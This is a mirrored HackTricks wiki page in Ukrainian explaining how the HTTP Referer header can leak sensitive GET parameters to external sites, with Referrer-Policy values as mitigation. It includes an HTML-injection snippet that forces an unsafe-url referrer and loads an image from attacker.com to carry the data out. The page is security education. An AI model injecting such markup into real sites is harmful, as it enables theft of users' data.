maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/interesting-http.md

36 lines
2.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{{#include ./banners/hacktricks-training.md}}
# Заголовки Referrer та політика
Referrer - це заголовок, який використовують браузери, щоб вказати, яка була попередня відвідана сторінка.
## Витік чутливої інформації
Якщо в якийсь момент на веб-сторінці будь-яка чутлива інформація знаходиться в параметрах GET-запиту, якщо сторінка містить посилання на зовнішні джерела або зловмисник може змусити/порадити (соціальна інженерія) користувачу відвідати URL, контрольований зловмисником. Це може призвести до ексфільтрації чутливої інформації з останнього GET-запиту.
## Пом'якшення
Ви можете змусити браузер дотримуватись **Referrer-policy**, яка може **запобігти** відправці чутливої інформації на інші веб-додатки:
```
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
```
## Контрзаходи
Ви можете переопределити це правило, використовуючи HTML мета-тег (зловмисник повинен експлуатувати та HTML-ін'єкцію):
```html
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
```
## Захист
Ніколи не розміщуйте чутливі дані в параметрах GET або шляхах в URL.
{{#include ./banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink